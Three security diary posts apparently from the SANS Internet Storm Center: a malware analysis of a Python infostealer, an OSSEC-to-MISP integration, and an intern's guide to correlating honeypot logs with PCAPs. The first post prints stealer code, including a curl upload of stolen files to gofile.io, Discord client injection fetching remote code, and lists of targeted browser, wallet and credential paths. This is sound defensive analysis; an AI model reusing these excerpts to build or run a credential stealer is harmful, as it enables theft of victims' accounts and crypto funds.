"K1w1" InfoStealer Uses gofile.io for Exfiltration, (Fri, May 31st)

Python remains a nice language for attackers, and I keep finding interesting scripts that are usually not very well detected by antivirus solutions. The one I found has a VT score of only 7/65 (SHA256:a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c[1]). I decided to call it the "k1w1" infostealer because this string is referenced in many variable and function names. The script has classic infostealer capabilities to find interesting pieces of data on the victim's computer, but it also implements some interesting techniques.

First, it uses gofile.io to exfiltrate data:

try:gofileserver = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
except:gofileserver = "store4"

gofile.io is a popular online file storage service[2]. Collected data is uploaded:

def UP104D7060F113(path):
    try:
        r = subprocess.Popen(f"curl -F \"file=@{path}\" https://{gofileserver}.gofile.io/uploadFile", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
        return loads(r[0].decode('utf-8'))["data"]["downloadPage"]
    except: return False

gofile.io provides guest access with sufficient capabilities to upload files and keep them available for a few days. Once a file is uploaded, a download link is returned in the JSON response. All links are shared on a Discord channel.
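
The response shape can be inferred from the stealer's own parsing code above: the download link sits under data.downloadPage. Here is a minimal sketch of that parsing step (the sample JSON below is illustrative, not a real gofile.io reply):

```python
import json

# Illustrative uploadFile response -- field names taken from the stealer's
# own parsing code above, not from official gofile.io API documentation.
sample = '{"status":"ok","data":{"downloadPage":"https://gofile.io/d/AbCdEf"}}'

def extract_download_link(raw):
    """Return the shared download link, or None if the reply is malformed."""
    try:
        return json.loads(raw)["data"]["downloadPage"]
    except (ValueError, KeyError, TypeError):
        return None
```

This extracted link is what the stealer then posts to its Discord channel.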

Besides the classic information, this infostealer also searches the victim's files in common directories for "keywords":

def K1W1():
    user = temp.split("\AppData")[0]
    path2search = [
        user    + "/Desktop",
        user    + "/Downloads",
        user    + "/Documents",
        roaming + "/Microsoft/Windows/Recent",
    ]

    key_wordsFiles = [
        "passw",
        "mdp",
        "motdepasse",
        "mot_de_passe",
        "login",
        "secret",
        "bot",
        "atomic",
        "account",
        "acount",
        "paypal",
        "banque",
        "bot",
        "metamask",
        "wallet",
        "crypto",
        "exodus",
        "discord",
        "2fa",
        "code",
        "memo",
        "compte",
        "token",
        "backup",
        "secret",
        "seed",
        "mnemonic"
        "memoric",
        "private",
        "key",
        "passphrase",
        "pass",
        "phrase",
        "steal",
        "bank",
        "info",
        "casino",
        "prv",
        "privé",
        "prive",
        "telegram",
        "identifiant",
        "personnel",
        "trading"
        "bitcoin",
        "sauvegarde",
        "funds",
        "récupé",
        "recup",
        "note",
    ]

    wikith = []
    for patt in path2search: 
        kiwi = threading.Thread(target=K1W1F113, args=[patt, key_wordsFiles])
        kiwi.start()
        wikith.append(kiwi)
    return wikith

You can see many French keywords. We can assume that the script targets French-speaking victims.
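
The filename matching is simple to reproduce on the defender's side, for example to check which of your own files such a stealer would grab. A condensed sketch of the K1W1() logic (keyword subset only):

```python
import os

# Defender-side re-implementation of the stealer's filename matching,
# using a subset of the keyword list shown above.
KEYWORDS = ["passw", "mdp", "motdepasse", "login", "secret",
            "wallet", "seed", "banque", "identifiant"]

def flag_files(root, keywords=KEYWORDS):
    """Return paths under `root` whose file name contains any keyword."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if any(k in name.lower() for k in keywords):
                hits.append(os.path.join(dirpath, name))
    return hits
```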

Classic applications are targeted:

   br0W53rP47H5 = [    
        [f"{roaming}/Opera Software/Opera GX Stable",               "opera.exe",        "/Local Storage/leveldb",           "/",             "/Network",             "/Local Extension Settings/"                      ],
        [f"{roaming}/Opera Software/Opera Stable",                  "opera.exe",        "/Local Storage/leveldb",           "/",             "/Network",             "/Local Extension Settings/"                      ],
        [f"{roaming}/Opera Software/Opera Neon/User Data/Default",  "opera.exe",        "/Local Storage/leveldb",           "/",             "/Network",             "/Local Extension Settings/"                      ],
        [f"{local}/Google/Chrome/User Data",                        "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome SxS/User Data",                    "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Beta/User Data",                   "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Dev/User Data",                    "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Unstable/User Data",               "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Canary/User Data",                 "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/BraveSoftware/Brave-Browser/User Data",          "brave.exe",        "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Vivaldi/User Data",                              "vivaldi.exe",      "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Yandex/YandexBrowser/User Data",                 "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserCanary/User Data",           "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserDeveloper/User Data",        "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserBeta/User Data",             "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserTech/User Data",             "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserSxS/User Data",              "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Microsoft/Edge/User Data",                       "edge.exe",         "/Default/Local Storage/leveldb",   "/Default",      "/Default/Network",     "/Default/Local Extension Settings/"              ]
    ]
    d15C0rDP47H5 = [
        [f"{roaming}/discord",          "/Local Storage/leveldb"],
        [f"{roaming}/Lightcord",        "/Local Storage/leveldb"],
        [f"{roaming}/discordcanary",    "/Local Storage/leveldb"],
        [f"{roaming}/discordptb",       "/Local Storage/leveldb"],
    ]

    p47H570Z1P = [
        [f"{roaming}/atomic/Local Storage/leveldb",                             "Atomic Wallet.exe",        "Wallet"        ],
        [f"{roaming}/Guarda/Local Storage/leveldb",                             "Guarda.exe",               "Wallet"        ],
        [f"{roaming}/Zcash",                                                    "Zcash.exe",                "Wallet"        ],
        [f"{roaming}/Armory",                                                   "Armory.exe",               "Wallet"        ],
        [f"{roaming}/bytecoin",                                                 "bytecoin.exe",             "Wallet"        ],
        [f"{roaming}/Exodus/exodus.wallet",                                     "Exodus.exe",               "Wallet"        ],
        [f"{roaming}/Binance/Local Storage/leveldb",                            "Binance.exe",              "Wallet"        ],
        [f"{roaming}/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb",     "Jaxx.exe",                 "Wallet"        ],
        [f"{roaming}/Electrum/wallets",                                         "Electrum.exe",             "Wallet"        ],
        [f"{roaming}/Coinomi/Coinomi/wallets",                                  "Coinomi.exe",              "Wallet"        ],
        ["C:\Program Files (x86)\Steam\config",                                 "steam.exe",                "Steam"         ],
        [f"{local}/Riot Games/Riot Client/Data",                                "RiotClientServices.exe",   "RiotClient"    ],
    ]
    t3136r4M = [f"{roaming}/Telegram Desktop/tdata", 'Telegram.exe', "Telegram"]

I also found code that injects into Discord files:

def inj3c710n():

    username = os.getlogin()

    folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']

    for folder_name in folder_list:
        deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
        if os.path.isdir(deneme_path):
            for subdir, dirs, files in os.walk(deneme_path):
                if 'app-' in subdir:
                    for dir in dirs:
                        if 'modules' in dir:
                            module_path = os.path.join(subdir, dir)
                            for subsubdir, subdirs, subfiles in os.walk(module_path):
                                if 'discord_desktop_core-' in subsubdir:
                                    for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
                                        if 'discord_desktop_core' in subsubsubdir:
                                            for file in subsubfiles:
                                                if file == 'index.js':
                                                    file_path = os.path.join(subsubsubdir, file)
                                                    injeCTmED0cT0r_cont = requests.get(inj3c710n_url).text
                                                    injeCTmED0cT0r_cont = injeCTmED0cT0r_cont.replace("%WEBHOOK%", h00k)
                                                    with open(file_path, "w", encoding="utf-8") as index_file:
                                                        index_file.write(injeCTmED0cT0r_cont)
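
A quick integrity check for this kind of tampering is possible because, on a clean install, discord_desktop_core's index.js is a single require() line. A sketch (this assumption about the default file content should be verified against a pristine install of your Discord version):

```python
# On a clean Discord install, discord_desktop_core/index.js is assumed to be
# this single require() line -- verify against a pristine install before
# relying on it. Anything else suggests tampering like the code above.
CLEAN_INDEX = "module.exports = require('./core.asar');"

def index_js_tampered(path):
    """Return True if index.js differs from the expected one-liner."""
    with open(path, encoding="utf-8") as f:
        return f.read().strip() != CLEAN_INDEX
```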

The script also implements classic evasion techniques based on the detection of VMs, IP addresses, and suspicious processes. Many wallet browser extensions are also targeted:

w411375 = [
    ["nkbihfbeogaeaoehlefnkodbefgpgknn", "Metamask"         ],
    ["ejbalbakoplchlghecdalmeeeajnimhm", "Metamask"         ],
    ["fhbohimaelbohpjbbldcngcnapndodjp", "Binance"          ],
    ["hnfanknocfeofbddgcijnmhnfnkdnaad", "Coinbase"         ],
    ["fnjhmkhhmkbjkkabndcnnogagogbneec", "Ronin"            ],
    ["egjidjbpglichdcondbcbdnbeeppgdph", "Trust"            ],
    ["ojggmchlghnjlapmfbnjholfjkiidbch", "Venom"            ],
    ["opcgpfmipidbgpenhmajoajpbobppdil", "Sui"              ],
    ["efbglgofoippbgcjepnhiblaibcnclgk", "Martian"          ],
    ["ibnejdfjmmkpcnlpebklmnkoeoihofec", "Tron"             ],
    ["ejjladinnckdgjemekebdpeokbikhfci", "Petra"            ],
    ["phkbamefinggmakgklpkljjmgibohnba", "Pontem"           ],
    ["ebfidpplhabeedpnhjnobghokpiioolj", "Fewcha"           ],
    ["afbcbjpbpfadlkmhmclhkeeodmamcflc", "Math"             ],
    ["aeachknmefphepccionboohckonoeemg", "Coin98"           ],
    ["bhghoamapcdpbohphigoooaddinpkbai", "Authenticator"    ],
    ["aholpfdialjgjfhomihkjbmgjidlcdno", "ExodusWeb3"       ],
    ["bfnaelmomeimhlpmgjnjophhpkkoljpa", "Phantom"          ],
    ["agoakfejjabomempkjlepdflaleeobhb", "Core"             ],
    ["mfgccjchihfkkindfppnaooecgfneiii", "Tokenpocket"      ],
    ["lgmpcpglpngdoalbgeoldeajfclnhafa", "Safepal"          ],
    ["bhhhlbepdkbapadjdnnojkbgioiodbic", "Solfare"          ],
    ["jblndlipeogpafnldhgmapagcccfchpi", "Kaikas"           ],
    ["kncchdigobghenbbaddojjnnaogfppfj", "iWallet"          ],
    ["ffnbelfdoeiohenkjibnmadjiehjhajb", "Yoroi"            ],
    ["hpglfhgfnhbgpjdenjgmdgoeiappafln", "Guarda"           ],
    ["cjelfplplebdjjenllpjcblmjkfcffne", "Jaxx Liberty"     ],
    ["amkmjjmmflddogmhpjloimipbofnfjih", "Wombat"           ],
    ["fhilaheimglignddkjgofkcbgekhenbh", "Oxygen"           ],
    ["nlbmnnijcnlegkjjpcfjclmcfggfefdm", "MEWCX"            ],
    ["nanjmdknhkinifnkgdcggcfnhdaammmj", "Guild"            ],
    ["nkddgncdjgjfcddamfgcmfnlhccnimig", "Saturn"           ], 
    ["aiifbnbfobpmeekipheeijimdpnlpgpp", "TerraStation"     ],
    ["fnnegphlobjdpkhecapkijjdkgcjhkib", "HarmonyOutdated"  ],
    ["cgeeodpfagjceefieflmdfphplkenlfk", "Ever"             ],
    ["pdadjkfkgcafgbceimcpbkalnfnepbnk", "KardiaChain"      ],
    ["mgffkfbidihjpoaomajlbgchddlicgpn", "PaliWallet"       ],
    ["aodkkagnadcbobfpggfnjeongemjbjca", "BoltX"            ],
    ["kpfopkelmapcoipemfendmdcghnegimn", "Liquality"        ],
    ["hmeobnfnfcmdkdcmlblgagmfpfboieaf", "XDEFI"            ],
    ["lpfcbjknijpeeillifnkikgncikgfhdo", "Nami"             ],
    ["dngmlblcodfobpdpecaadgfbcggfjfnm", "MaiarDEFI"        ],
    ["ookjlbkiijinhpmnjffcofjonbfbgaoc", "TempleTezos"      ],
    ["eigblbgjknlfbajkfhopmcojidlgcehm", "XMR.PT"           ],
]

[1] https://www.virustotal.com/gui/file/a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c
[2] https://gofile.io/welcome

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Feeding MISP with OSSEC, (Thu, May 30th)

I've been a big fan of OSSEC[1] for years. OSSEC ("Open Source Security Event Correlator") is a comprehensive, open-source host-based intrusion detection system (HIDS). It is designed to monitor and analyze system logs, detect suspicious activities, and provide real-time alerts for security incidents. OSSEC can perform log analysis, file integrity monitoring, rootkit detection, and active response to mitigate threats. It supports various platforms, including Linux, Windows, and macOS, and can be integrated with various security tools and SIEM solutions. I already wrote some diaries about it in the past[2]. I run it on all my servers and have made some contributions to the project.

One of the features I like most is "Active-Response". It allows us to automatically take predefined actions in response to detected security events or threats. When a specific rule is triggered, OSSEC can execute scripts or commands to mitigate the threat, such as blocking an IP address, disabling a user account, or restarting a service. This feature enhances the system's security by providing real-time, automated reactions to potential intrusions or malicious activities, reducing the window of opportunity for attackers to exploit vulnerabilities.

Being a big fan of MISP[3] as well, making the two talk to each other is a great way to improve our detection capabilities. Most of my OSSEC agents are installed on Internet-facing servers that get scanned/visited/flooded by thousands of malicious requests. The default Active-Response enabled in OSSEC temporarily blocks offending addresses to slow down attackers (for example, during brute-force attacks). These addresses are also interesting for multiple reasons:

1. If one host is attacked, the same IP address could be blocked on all servers

2. The IP address can be shared with peers (it's an interesting IOC - Indicator of Compromise)

3. We can track if the same IP address is coming back regularly

I wrote an Active-Response script that, if conditions are met, will submit offending IP addresses to a MISP instance. How does it work?

First, you need to configure a new Active-Response config:

<active-response>
  <disabled>no</disabled>
  <command>ossec2misp</command>
  <location>server</location>
  <rules_id>100213,100201,31509</rules_id>
</active-response>

The most important parameter is the list of rules that will trigger the active response. For example, my rule 31509 detects WordPress login brute-force attacks:

<!-- WordPress wp-login.php brute force -->
  <rule id="31509" level="3">
    <if_sid>31108</if_sid>
    <url>wp-login.php|/administrator</url>
    <regex>] "POST \S+wp-login.php| "POST /administrator</regex>
    <description>CMS (WordPress or Joomla) login attempt.</description>
</rule>

When the alert triggers, the OSSEC server will execute the command called "ossec2misp":

<command>
  <name>ossec2misp</name>
  <executable>ossec2misp.py</executable>
  <expect>srcip</expect>
  <timeout_allowed>no</timeout_allowed>
</command>

The command will call my Python script located in the Active-Response scripts directory (usually $OSSEC_HOME/active-response/bin/). The script can be configured; most options are self-explanatory:

misp_url          = "https://misp.domain.tld"
misp_key          = "<redacted>"
misp_verifycert   = True
misp_info         = "OSSEC ActiveResponse"      # Event title
misp_last         = "30d"                       # Max period to search for IP address
misp_new_event    = False                       # Force the creation of a new event for every report
misp_distribution = 0                           # The distribution setting used for the newly created event, if relevant. [0-3]
misp_analysis     = 1                           # The analysis level of the newly created event, if applicable. [0-2]
misp_threat       = 3                           # The threat level ID of the newly created event, if applicable. [1-4]
misp_tags         = [ "source:OSSEC" ]          # Tags for the newly created event, if applicable
misp_publish      = True                        # Automatically publish the event
syslog_server     = "192.168.1.1"               # If defined, enable syslog logging
redis_server      = "redis"                     # Redis server hostname/ip
redis_port        = 6379                        # Redis server port
redis_db          = 0                           # Redis server db

The Redis server is used to prevent the MISP server from being flooded with API requests: once an IP address has been reported, it is stored in Redis for one hour.
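
The script stores the IP in Redis with an expiry; the same deduplication pattern can be sketched in memory for illustration (the real script talks to the Redis server configured above, not a Python dict):

```python
import time

# In-memory sketch of the dedup logic: an IP reported within the last
# `ttl` seconds is skipped; otherwise its report time is recorded.
# The real script uses Redis with a key expiry instead of a dict.
def already_reported(cache, ip, ttl=3600, now=None):
    """True if `ip` was reported less than `ttl` seconds ago; else record it."""
    now = time.time() if now is None else now
    last = cache.get(ip)
    if last is not None and now - last < ttl:
        return True
    cache[ip] = now
    return False
```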

When an offending IP address is already present in MISP, the script will add a "sighting" to it. The purpose of "sighting" is to provide feedback on the usage and relevance of the IP address within the platform. This helps in verifying the prevalence and impact of the IOC, enhances collaborative threat intelligence by validating data, and assists in prioritizing IP addresses based on their sightings frequency and relevance.
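
In REST terms, the lookup and the sighting boil down to two small JSON payloads. A hedged sketch (field names follow MISP's restSearch and sightings endpoints, but check your instance's API version; the script itself may use PyMISP instead):

```python
# Hypothetical payload builders -- the actual script's implementation
# and field choices may differ.
def build_search_payload(ip, last="30d"):
    """Body for POST /attributes/restSearch: find the IP seen within `last`."""
    return {"returnFormat": "json", "type": "ip-src", "value": ip, "last": last}

def build_sighting_payload(ip):
    """Body for POST /sightings/add: record one more sighting of the IP."""
    return {"value": ip, "source": "OSSEC ActiveResponse"}
```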

Here is an example of an OSSEC event:

My script is available in my GitHub repo[4]. Comments, improvements, or ideas are welcome!

[1] https://ossec.net/
[2] https://isc.sans.edu/search.html?q=ossec&token=&Search=Search
[3] https://www.misp-project.org
[4] https://github.com/xme/ossec/blob/main/ossec2misp.py

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs [Guest Diary], (Tue, May 28th)

[This is a Guest Diary by Joshua Jobe, an ISC intern as part of the SANS.edu BACS program]

Introduction

Upon starting the internship in January 2024, I wondered how I was going to tackle analyzing all the logs, how to parse and understand JSON files, and how to make sense of the plethora of details to even attempt an attack observation.  Where do the files go, how do we correlate the filenames with the hashes, what’s the deal with webhoneypot logs?  During the introductory call, mentor handler Guy Bruneau mentioned the DShield SIEM [1] he has been working on for everyone to use to enhance the internship experience.  I felt this was the perfect opportunity to build something that would assist with correlating the ‘attacks’ on the sensors by ingesting the logs into a SIEM.  This is especially useful for those who want to see the details in a way that is more organized and easier to extrapolate data from.  However, simply reviewing activity in the SIEM may not always be enough to build a complete picture for an attack observation.  Likewise, simply parsing through the logs may not always give you a complete picture either.

This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious files, HTTP requests, Cowrie/Webhoneypot JSON logs and PCAPs.

Where to Start

After initially setting up the DShield Honeypot (sensor), it will inevitably take 2-3 weeks or more to begin seeing attacks, especially any that may involve uploading/downloading files.  Be patient.  Interesting IP addresses, files, URLs, TTY logs, etc. will show up.  It is imperative that you follow the instructions to properly expose your sensor or sensors to the internet.
 
For example, I am running two sensors behind an Asus RT-AC86U router.  Since this router doesn’t natively allow the same port entries when port forwarding to two internal IP addresses, I opted to set up one sensor with only TCP ports 8000, 2222, 2223, and 8443 open, and the second sensor open to the entire port range: TCP/UDP 1-65535.  Utilizing the demilitarized zone (DMZ) is not currently an option due to how my network is set up.  The sensor with the entire port range open tends to see more traffic.

Once you have your sensors up and running, I highly recommend setting up the DShield SIEM previously mentioned.  Here are some recommendations to consider for the SIEM:

  1. Physical system or VM – it is best to install this on a system you can leave running 24/7 and not use your primary laptop or PC. Using a dedicated system allows the SIEM to constantly ingest the files from the sensors with minimal delays in populating the details in Kibana.  Occasional restarts and updates are expected, but they will be less frequent than if you use your primary system.  I repurposed an old HP laptop with 8 GB of RAM specifically for this task and placed it next to the sensors.
  2. Hard Drive Space – Consider 300-500GB at minimum.  This is critical to hash out ahead of time.  The minimum recommended space for the Docker partition is 300GB; however, the more features you integrate (Arkime, Zeek, PCAP captures, etc.), the quicker it will fill up.  I started with 100GB thinking it would be plenty.  I was wrong, and within about a month and a half the SIEM wasn’t operating correctly due to not having enough space.  Deleting non-critical data worked for about a week.  I ended up adding a spare 1 TB external HDD, then expanded the volume group and logical volume to use the entire drive.

Now that the sensors are collecting data and the SIEM is ingesting the logs, you need to focus on what your first attack observation will be on.

SIEM Review and Correlation of File Uploads

After about 3 weeks, you should begin seeing quite a bit of interesting activity on the SIEM.  Here are a few examples of what you may see:

You have multiple options to focus your attention on.  If you narrow your results by IP, you may see the associated Username & Passwords, any commands that were attempted, or perhaps filenames.  If you filter by filename, you get the associated IP address or addresses along with all other data associated with just the filename.  When filtering by any filter other than IP to find associated IP addresses, I recommend choosing an IP or multiple IP addresses to populate additional data specific to that IP.  For example, if you want to find associated IP addresses for filename ‘sshd’, hover the cursor over the ‘Filename’ and select the + to add it as a filter near the top:

This filter results in the following IP addresses, Session Codes, and the associated SHA256 file hashes, among other information:

As you can see, filtering by ‘sshd’ identifies 4 IP addresses, associated sessions, and 2 different SHA256 hashes for the same filename.  This also narrows down only the logs related to this filter:
You can further narrow down the results by either IP address or focus on a single hash.  Let’s focus on a single IP address.  Following the same example for filtering by filename, choose an IP address to filter on:

This approach will narrow down the details specific to this IP address.  Select the X to remove the ‘sshd’ filter.  I recommend this approach to see if this IP address is associated with other activities, such as web requests.

Filtering on a single IP now reveals other session details that you can use to begin building an understanding of this threat actor.

Using the single-IP search also reveals related activity, where 46 logs were recorded from this threat actor’s attempts:
There are additional fields for this section of the SIEM; however, they are cut off for brevity.  Additional fields include destination port, source user command, username and password fields, along with the HTTP request body for any web requests.
If you want to find the related details for all the associated IP addresses for the ‘sshd’ file, use the search field to create the expanded filter:

Other than what we’ve already covered, filtering using this search criteria will reveal all associated sessions and other interactions applicable to just those IP addresses.  In this example, there are 148 entries related to these IP addresses:

For the most part, for observations that relate to files uploaded to a honeypot, the SIEM is about all I need.  Reviewing the Cowrie JSON logs pulls everything with all relevant details for each IP address into a format I feel is a bit easier to follow.  Some data may not always populate on the SIEM, so it isn’t a bad idea to review the logs from the honeypot to confirm.

For Attack Observations related to malicious files, use VirusTotal to check the file hash and decide if it’s worth investigating further using other sandboxes such as Cuckoo Sandbox [2] or Joe Sandbox Cloud [3], among others.  Alternatively, using a virtual machine (VM) to perform various types of malware analysis may reveal details not reported on using automatic malware analysis.

HTTP Requests

One of the great things about using the SIEM is that you get a quick, upfront view of all the interactions happening on your sensor or sensors.  You could also parse through the logs manually to get similar data.  However, one thing that I just couldn’t wrap my head around is what is so special about these web requests?  Sure, we can Google the URLs, perhaps find CVEs or other sources related to a URL.  You might even be able to find vulnerable systems open on the internet.  For me, reviewing these requests on the SIEM or parsing through the logs still didn’t answer why.  Here is an example of web requests and user agents you might see on the SIEM to decide what you want to focus on:


Just like narrowing down results from potentially malicious files, we can do the same with the requests on the web interface of the SIEM to find the related IPs and other details.  Something I didn’t point out before is that the SIEM includes features to facilitate gathering information on a threat actor from CyberGordon, Censys, Shodan, or internally using Cont3xt:
By narrowing down interesting files or web requests, you can use this section to visit the applicable websites for more information.  It is just an easier way of clicking and viewing details about that IP address.
Since the SIEM wasn’t cutting it for me with web requests, I turned to the logs from the sensors to manually parse.  However, as I will expand on in the last section, neither was really answering my question of what is making these requests so special.  But first, let’s turn to the logs.

Log Reviews from the DShield Sensor

Parsing the logs reveals a lot of details about an IP address or even web requests.  When I first started learning how to parse the JSON logs, I used both ChatGPT and an article from DigitalOcean called “How To Transform JSON Data with jq” [4].  Once you understand the structure of the JSON files, it is simple to parse the logs based on just about any search criteria.  To parse Telnet/SSH logs based on an IP address, you can use these commands:
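
Cowrie writes one JSON object per line, so the same filter jq performs is also easy to sketch in Python (the src_ip key follows Cowrie's log schema; the sample events below are made up, using documentation IP ranges):

```python
import json

# Mirror of a jq filter on src_ip over Cowrie's line-delimited JSON logs.
def events_for_ip(lines, ip):
    """Return the Cowrie events whose src_ip matches `ip`."""
    events = []
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue  # skip malformed lines
        if event.get("src_ip") == ip:
            events.append(event)
    return events

# Illustrative sample log lines (not real attack data).
log = [
    '{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","username":"root"}',
    '{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7"}',
]
```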

There are a lot more details that can be pulled out, but you also must know what that log contains to know what the structure is.  Use the following command to parse the first object containing all the associated key-value pairs:

As an alternative to running the above commands, I decided to create a Python script to automate this approach to extract details I felt at the time to contain the details I wanted to focus on. [5]

I maintain two sensors, which automatically transfer copies of logged data to separate folders daily.  The script is in its own directory, so the file paths are relative to the script's location.  Additionally, users have the flexibility to filter data either by IP address or by Session ID.  This is where the DShield SIEM proves invaluable: users can first identify interesting data points, then further refine their search based on either IP address or Session ID:

For the sake of space, I only copied a portion of the results.  The output above also has data for all related sessions associated with that IP address.

When it comes to the webhoneypot logs, the process is similar, but the details will be different as the object and key-value pairs will be different.  Here is an example output of the webhoneypot logs:

The webhoneypot logs contain a lot of data.  Most, in my opinion, aren’t applicable to the details I would like to see.  Aside from manually parsing the files like the TELNET/SSH logs, I created a script specific to the format for these logs [5].  This gives a bit of flexibility for what you want to search for and whether you want to include any URLs that only begin with a forward slash “/”.  Depending on what you are searching for, the search could return hundreds of resulting logs.  For this reason, the script saves the results to a file, which also allows it to run faster.  Here is an example of running the script, then a partial output of the file:

The partial URL search is useful if you notice multiple URLs that contain a subdirectory in the path such as /jenkins/script and /jenkins/login.
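
That partial-URL search boils down to a prefix match over the parsed events. A minimal sketch (the "url" key is assumed from the webhoneypot log schema; the sample events are illustrative only):

```python
# Keep only webhoneypot events whose requested URL starts with `prefix`,
# e.g. "/jenkins/" to catch both /jenkins/script and /jenkins/login.
def urls_with_prefix(events, prefix):
    return [e for e in events if e.get("url", "").startswith(prefix)]

# Illustrative sample events (field name assumed, values made up).
events = [{"url": "/jenkins/script"}, {"url": "/jenkins/login"},
          {"url": "/index.html"}]
```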

While the web logs provide a lot of details, this goes back to what I mentioned earlier about something still seemed to be missing and answering the question of why these are being accessed.  This is where the PCAPs in the next section come into play.

Why You Should Use PCAPs

Having a honeypot running provides only so much insight into what a threat actor is doing just by reviewing the logs.  However, it wasn’t until I decided to focus an attack observation based upon the web requests that I realized something is missing.  If you haven’t decided to collect PCAPs up to this point, I highly recommend evaluating options to automatically collect them daily.  One option is using Daemonlogger by following the instructions provided by Mr. Bruneau’s DShield SIEM setup on Github [1] or finding a solution that works best for you.  

What you don’t get with the web logs from the honeypot is any inclination of what the threat actor may be doing – at least not from what I was able to observe.  For example, a path stood out to me that had over 500 requests to /cgi-bin/nas_sharing.cgi.  If you aren’t familiar with cgi-bin, it is often found on routers and other network devices such as NAS (network attached storage) devices from manufacturers such as Linksys, D-Link, Netgear, QNAP, Synology, etc.  A vulnerability in a path such as this is enticing to the actor as you will see in a moment.

After you have narrowed down an attack observation, found a URL path, and further reviewed the logs, you will also have narrowed down the dates to focus on.  Going back to how Daemonlogger is set up, it logs one PCAP file to a daily folder.  This makes it easy to go directly to the PCAP that holds the traffic for the URL you want to investigate further.  Taking the example of /cgi-bin/nas_sharing.cgi, I reviewed PCAPs between 15-24 Apr 2024.  This is what I discovered that made these web requests even more interesting:
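Because the capture job writes one PCAP per daily folder, narrowing to a date range is just date arithmetic.  A small sketch (the folder-name format is an assumption; adjust it to however your capture job names its daily directories):

```python
from datetime import date, timedelta

def daily_folders(start: date, end: date, fmt: str = "%Y-%m-%d"):
    """Yield one folder name per day in [start, end], one daily PCAP each."""
    day = start
    while day <= end:
        yield day.strftime(fmt)
        day += timedelta(days=1)

# Folders to pull for the /cgi-bin/nas_sharing.cgi review (15-24 Apr 2024):
folders = list(daily_folders(date(2024, 4, 15), date(2024, 4, 24)))
```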

Remote Code Execution (RCE):

Parsing through the honeypot logs, I couldn't find any correlation to that command.  The threat actor is using obfuscation, encoding the command in Base64 to attempt to hide what they are doing.  Decoding the encoded string reveals the following:
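The observed encoded string isn't reproduced here, but decoding this kind of obfuscation is a one-liner.  A hedged example with a made-up payload (not the actual command from the capture):

```python
import base64

def decode_b64_command(encoded: str) -> str:
    """Decode a Base64-obfuscated shell command, tolerating stripped padding."""
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")

# Hypothetical example, not the observed payload:
print(decode_b64_command("ZWNobyBoZWxsbw"))  # prints: echo hello
```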

With this information, you can build a rather thorough attack observation, having more data than simply a web request and researching the vulnerabilities associated with those file paths.
Here is one more HTTP request to highlight why you should capture network traffic on the sensor:

Without it, all you would find in the logs is that the HTTP request method is POST and URL is /device.rsp along with other associated data.

Final Thoughts

If you didn't catch the details regarding data retention on the sensor at the start of the internship, the logs are deleted at certain intervals.  If you want long-term retention, set up an automatic way to transfer the logs to a separate system or a separate folder on the sensor.  My first or second attack observation included some logs that happened to be at the tail end of the deletion window.  Fortunately, I had copies of the data, but I had been relying on the details stored on the sensor; when I went to parse the data again the next day, it was gone.

I can't stress enough the importance of capturing network traffic on the sensor.  For the first month or so I hadn't considered it.  After I started capturing the traffic, I rarely reviewed the PCAPs, as most of what I was looking at was encrypted traffic from the file uploads.  When it came to the web requests, however, this proved to be invaluable.

